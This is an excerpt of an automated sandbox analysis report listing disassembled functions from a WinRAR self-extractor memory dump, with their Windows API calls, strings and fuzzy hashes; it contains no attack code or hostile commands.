                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1423051803-0
                                                                              • Opcode ID: 111cdcc4006098c17b788b55de4fa631682164e86957c1129bed32eec4a78d68
                                                                              • Instruction ID: f68509d46046e4e578e17c979175dd86f42f7a5768781071e811ef6ac049ef5d
                                                                              • Opcode Fuzzy Hash: 111cdcc4006098c17b788b55de4fa631682164e86957c1129bed32eec4a78d68
                                                                              • Instruction Fuzzy Hash: D25191B260028AAFEB217F628C85EBB36A9EF44750F5A4139FD48DA151EB31DC10D670
                                                                              Function 00DDD728 Relevance: 7.6, APIs: 5, Instructions: 89registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00DDD72F
                                                                              • RegOpenKeyExW.KERNEL32(?,00000000,00000000,00000001,?,00000020), ref: 00DDD748
                                                                              • RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000001,?,00000020), ref: 00DDD769
                                                                              • RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000001,?,00000020), ref: 00DDD7D2
                                                                              • RegCloseKey.KERNEL32(?,?,00000000,00000000,00000001,?,00000020), ref: 00DDD80E
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseH_prolog3Open
                                                                              • String ID:
                                                                              • API String ID: 1213317842-0
                                                                              • Opcode ID: e8aa53371961a8ab01c4c6d2e1072edbc8050e31b773a63fb9ad28e2f3667e09
                                                                              • Instruction ID: 143b0c3f302e957305f442f94315aaf5ac2d422a3855b3486005d78d83466feb
                                                                              • Opcode Fuzzy Hash: e8aa53371961a8ab01c4c6d2e1072edbc8050e31b773a63fb9ad28e2f3667e09
                                                                              • Instruction Fuzzy Hash: CC312E79E0020AAEDF04EFB5C896EFE7779EF59340B108119F511A7291EA309E058B30
                                                                              Function 00DDD2BD Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DDD2CE
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DDD2DF
                                                                              • IsDialogMessageW.USER32(000204C2,?), ref: 00DDD2F3
                                                                              • TranslateMessage.USER32(?), ref: 00DDD301
                                                                              • DispatchMessageW.USER32(?), ref: 00DDD30B
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                              • String ID:
                                                                              • API String ID: 1266772231-0
                                                                              • Opcode ID: 061b96b3a16813d079fe18d5f9b9820a6268cbd602c88c7a070cd5c7ba669b57
                                                                              • Instruction ID: 337cdbd15d30fa3622225cb71b2072c6984a1b64ddb58e7093ede8f6834048b0
                                                                              • Opcode Fuzzy Hash: 061b96b3a16813d079fe18d5f9b9820a6268cbd602c88c7a070cd5c7ba669b57
                                                                              • Instruction Fuzzy Hash: C6F0B7B2A0212AAFCF20AFE3EC4CDDB7FACEF063907048415B515E2251E624D509CBB1
                                                                              Function 00DDC5EE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 00DDC60E
                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 00DDC645
                                                                                • Part of subcall function 00DD84BA: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,Function_000184BA,00DD0C5F,00000001,00000000,?,00000001,00DD0F1C,00000044,00DCBDF8), ref: 00DD84CA
                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00DDC635
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                              • String ID: EDIT
                                                                              • API String ID: 4243998846-3080729518
                                                                              • Opcode ID: 27caadf74beedaab70d827c4902066ab5d66f47ef43e3be6bb9e53b7fecdf9e3
                                                                              • Instruction ID: 35f52eba3fd8c1bf1e3e3211335b1d743468e2afe16ea28a306922c9cdd75e0e
                                                                              • Opcode Fuzzy Hash: 27caadf74beedaab70d827c4902066ab5d66f47ef43e3be6bb9e53b7fecdf9e3
                                                                              • Instruction Fuzzy Hash: 26F0C234B01214ABE7209B269D0AFAE77AC9F89700F044066A901B73C0DFB0AD0585BA
                                                                              Function 00DE7522 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DE74D3,00000000,?,00E09120,?,?,?,00DE7676,00000004,InitializeCriticalSectionEx,00DFC504,InitializeCriticalSectionEx), ref: 00DE752F
                                                                              • GetLastError.KERNEL32(?,00DE74D3,00000000,?,00E09120,?,?,?,00DE7676,00000004,InitializeCriticalSectionEx,00DFC504,InitializeCriticalSectionEx,00000000,?,00DE742D), ref: 00DE7539
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DE7561
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad$ErrorLast
                                                                              • String ID: api-ms-
                                                                              • API String ID: 3177248105-2084034818
                                                                              • Opcode ID: a2754c0dd79b572b277c1c0e0872839b0354b4b185cfa6a1b5cc7397802b4054
                                                                              • Instruction ID: 9e54685637ed5d6615cf64cada9214f3202706aef8ceffc5abf886fccaea4c39
                                                                              • Opcode Fuzzy Hash: a2754c0dd79b572b277c1c0e0872839b0354b4b185cfa6a1b5cc7397802b4054
                                                                              • Instruction Fuzzy Hash: F4E04830684349FBDF102FA1DC06B2D3A54AB00BA1F588021F95CE81E0DB61E910C6B5
                                                                              Function 00DCEFB4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DCEFBB
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000020,00DCF138,00000000), ref: 00DCEFE0
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000020,00DCF138,00000000), ref: 00DCF020
                                                                              • GetLastError.KERNEL32(00000020,00DCF138,00000000), ref: 00DCF04A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory$ErrorH_prolog3_Last
                                                                              • String ID:
                                                                              • API String ID: 3709856315-0
                                                                              • Opcode ID: f377b16483b4aa9deb3f6ce0eae04aeb3eb36a42481975c4679ff636275db03d
                                                                              • Instruction ID: a320050eee9f12b75920c17d4bcfc9ed647f3502b5c7efc7aa5222ed3bcc9abe
                                                                              • Opcode Fuzzy Hash: f377b16483b4aa9deb3f6ce0eae04aeb3eb36a42481975c4679ff636275db03d
                                                                              • Instruction Fuzzy Hash: 1711063A60031647DF14A7708866FFDA762DF55B50F28842DF852E72C3EF3489059171
                                                                              Function 00DCEA9D Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6,?,00000000,?,?,00DCE969,?,?), ref: 00DCEAAD
                                                                              • ReadFile.KERNEL32(?,?,?,00000000,00000000,?,00000000,?,?,00DCE969,?,?), ref: 00DCEAC5
                                                                              • GetLastError.KERNEL32(?,00DCE969,?,?,?,?,?,?,?,?,?,?,?,00DF9224,000000FF), ref: 00DCEAF7
                                                                              • GetLastError.KERNEL32(?,00DCE969,?,?,?,?,?,?,?,?,?,?,?,00DF9224,000000FF), ref: 00DCEB16
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$FileHandleRead
                                                                              • String ID:
                                                                              • API String ID: 2244327787-0
                                                                              • Opcode ID: a374e7c2c40b164c4a7ed001e1f31a211b57fbf9999b6616b13f31f3fe5bb6be
                                                                              • Instruction ID: 359ef31b0e4989cb1bfc901f9815b243d55c6fbe46fad795b4e40f0d5f9794b8
                                                                              • Opcode Fuzzy Hash: a374e7c2c40b164c4a7ed001e1f31a211b57fbf9999b6616b13f31f3fe5bb6be
                                                                              • Instruction Fuzzy Hash: 581148B190060AEBDB319B60D804F7A77AABB05361B14862EF866C7690DB70ED40CB71
                                                                              Function 00DD319B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000,00DD28DD,00DDE8CE), ref: 00DD319D
                                                                              • FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 00DD31AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: FindHandleModuleResource
                                                                              • String ID: RTL
                                                                              • API String ID: 3537982541-834975271
                                                                              • Opcode ID: af7ecfcc2dfeeeca68844f74ed4370bc3f247fa56ccb144c0aad4b5efeae7b19
                                                                              • Instruction ID: 5c71022f4aec63e3a37426dfe741ee070ef0413cda6f3732dfdf16ecdabc7415
                                                                              • Opcode Fuzzy Hash: af7ecfcc2dfeeeca68844f74ed4370bc3f247fa56ccb144c0aad4b5efeae7b19
                                                                              • Instruction Fuzzy Hash: 1CC04C30345741AAEA205B729C0DB563968AB03B56F44C085B156EA7D1EBA5D144CB36
                                                                              Function 00DD6D27 Relevance: 4.6, APIs: 3, Instructions: 53libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DD6D2E
                                                                              • GetSystemDirectoryW.KERNEL32(00000000), ref: 00DD6D59
                                                                                • Part of subcall function 00DD0D19: __EH_prolog3_GS.LIBCMT ref: 00DD0D20
                                                                              • LoadLibraryW.KERNEL32(00000000,00DD4B85,?,00000104,?,0000005C,00DD4B85,00000000,00DD4D83,00000000,?,?,?,?,00DD4C55,?), ref: 00DD6DB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3_$DirectoryLibraryLoadSystem
                                                                              • String ID:
                                                                              • API String ID: 4248954170-0
                                                                              • Opcode ID: 5407a6a63c051bfc3b12bcc2113cdc1cf0b01cb1e9ac0042393a8d6cd2621992
                                                                              • Instruction ID: 5591ec498f1b0b5f5fdd650638df932cccaca54ed2bfab164a20413f68a6e3b4
                                                                              • Opcode Fuzzy Hash: 5407a6a63c051bfc3b12bcc2113cdc1cf0b01cb1e9ac0042393a8d6cd2621992
                                                                              • Instruction Fuzzy Hash: 2F11E978C002199ADB04EBE0D856FEDB778EF16700F50815DE412A7296EF746A0ACA71
                                                                              Function 00DCF2F2 Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DCF2F9
                                                                              • GetFileAttributesW.KERNEL32(00000000,0000001C,00DCF2CA,?,00DCA3FB), ref: 00DCF306
                                                                                • Part of subcall function 00DD1520: __EH_prolog3_GS.LIBCMT ref: 00DD1527
                                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 00DCF336
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFileH_prolog3_
                                                                              • String ID:
                                                                              • API String ID: 2428883790-0
                                                                              • Opcode ID: 52f2da4b75983b6a80762d6d86086667cb3efd67a620752fe6cbffec8e663d32
                                                                              • Instruction ID: 755b22d11233adc0367d8c32440736fdc09dae3594a93dd8693eeb7a45f45be9
                                                                              • Opcode Fuzzy Hash: 52f2da4b75983b6a80762d6d86086667cb3efd67a620752fe6cbffec8e663d32
                                                                              • Instruction Fuzzy Hash: D3F08C3A90025597CB10BBB0C856AECB736EF15330F494269E911B72D2DF344D4A9675
                                                                              Function 00DECBFE Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(?,?,00DECBF8,00000016,00DE7832,?,?,381977BE,00DE7832,?), ref: 00DECC0F
                                                                              • TerminateProcess.KERNEL32(00000000,?,00DECBF8,00000016,00DE7832,?,?,381977BE,00DE7832,?), ref: 00DECC16
                                                                              • ExitProcess.KERNEL32 ref: 00DECC28
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CurrentExitTerminate
                                                                              • String ID:
                                                                              • API String ID: 1703294689-0
                                                                              • Opcode ID: a45702e4a67e26d3e6eabc3c763f120aa5cddc0218803abdca714d18bd3f7d29
                                                                              • Instruction ID: 6b113ede0c2251ac40c12442deaea794deb63c8e88e7217f86fff1400116e8b1
                                                                              • Opcode Fuzzy Hash: a45702e4a67e26d3e6eabc3c763f120aa5cddc0218803abdca714d18bd3f7d29
                                                                              • Instruction Fuzzy Hash: 7AD06731010348ABCB153F62DD099AA3F2AEE45351B549011B91D85172DF319997DAB0
                                                                              Function 00DDBB03 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3.LIBCMT ref: 00DDBB0A
                                                                                • Part of subcall function 00DDB49D: CLSIDFromString.COMBASE(Shell.Explorer,?), ref: 00DDB4BA
                                                                                • Part of subcall function 00DDB49D: CoCreateInstance.COMBASE(?,00000000,00000005,00DFB77C,?), ref: 00DDB4D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFromH_prolog3InstanceString
                                                                              • String ID: about:blank
                                                                              • API String ID: 1164031602-258612819
                                                                              • Opcode ID: 2e54f88aef7098843a83ccb7ca1c1546d89be716c28100b764a670b5e18a54b9
                                                                              • Instruction ID: 0972e7c661b1deb16fb916e17b8f7c19df1f7d618564b8544850a09c43bf5622
                                                                              • Opcode Fuzzy Hash: 2e54f88aef7098843a83ccb7ca1c1546d89be716c28100b764a670b5e18a54b9
                                                                              • Instruction Fuzzy Hash: D6315E70610205DFDB08EF68D855A7E77A9EF88324B15805FA805AB396DF74AD00CB74
                                                                              Function 00DE13F1 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_GS.LIBCMT ref: 00DE13FB
                                                                                • Part of subcall function 00DDD728: __EH_prolog3.LIBCMT ref: 00DDD72F
                                                                                • Part of subcall function 00DDD728: RegOpenKeyExW.KERNEL32(?,00000000,00000000,00000001,?,00000020), ref: 00DDD748
                                                                                • Part of subcall function 00DDD728: RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000001,?,00000020), ref: 00DDD769
                                                                                • Part of subcall function 00DDD728: RegQueryValueExW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000001,?,00000020), ref: 00DDD7D2
                                                                                • Part of subcall function 00DDD728: RegCloseKey.KERNEL32(?,?,00000000,00000000,00000001,?,00000020), ref: 00DDD80E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: QueryValue$CloseH_prolog3H_prolog3_Open
                                                                              • String ID: Software\WinRAR SFX
                                                                              • API String ID: 3244892100-754673328
                                                                              • Opcode ID: ac31b0d983e7147716c2ab0cfa71153c950eb686a97d960a75fa7a3962fd40c8
                                                                              • Instruction ID: 532e4df6add4971f1bc34f2fffa4f9991064b2867670e1049486b3a7399c42f8
                                                                              • Opcode Fuzzy Hash: ac31b0d983e7147716c2ab0cfa71153c950eb686a97d960a75fa7a3962fd40c8
                                                                              • Instruction Fuzzy Hash: CA2139399002698ADB14EBA0C861FDCBB74FF15310F54809DE446B7282EF741A89CF70
                                                                              Function 00DF1317 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00DEF2FE), ref: 00DF1357
                                                                              Strings
                                                                              • InitializeCriticalSectionEx, xrefs: 00DF1327
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                              • String ID: InitializeCriticalSectionEx
                                                                              • API String ID: 2593887523-3084827643
                                                                              • Opcode ID: 38ce7248939393e8ea8a391597843141dcc4c3fb0dbd5e7212a290f6d44b41f3
                                                                              • Instruction ID: 5ce71fb95b30ed531da06227281744ea82cd6a97952ddd3a3f94a40fd5199d04
                                                                              • Opcode Fuzzy Hash: 38ce7248939393e8ea8a391597843141dcc4c3fb0dbd5e7212a290f6d44b41f3
                                                                              • Instruction Fuzzy Hash: 86E06D3618031DBBCB112F81DC05DBE7F12DB01B60F06C011FB1895661C6B29920EBB1
                                                                              Function 00DF1218 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Alloc
                                                                              • String ID: FlsAlloc
                                                                              • API String ID: 2773662609-671089009
                                                                              • Opcode ID: 734ac98a5040bfac3f94558682cac75a7c1dd0036b9839d09b0cd0c1ad7e2fa9
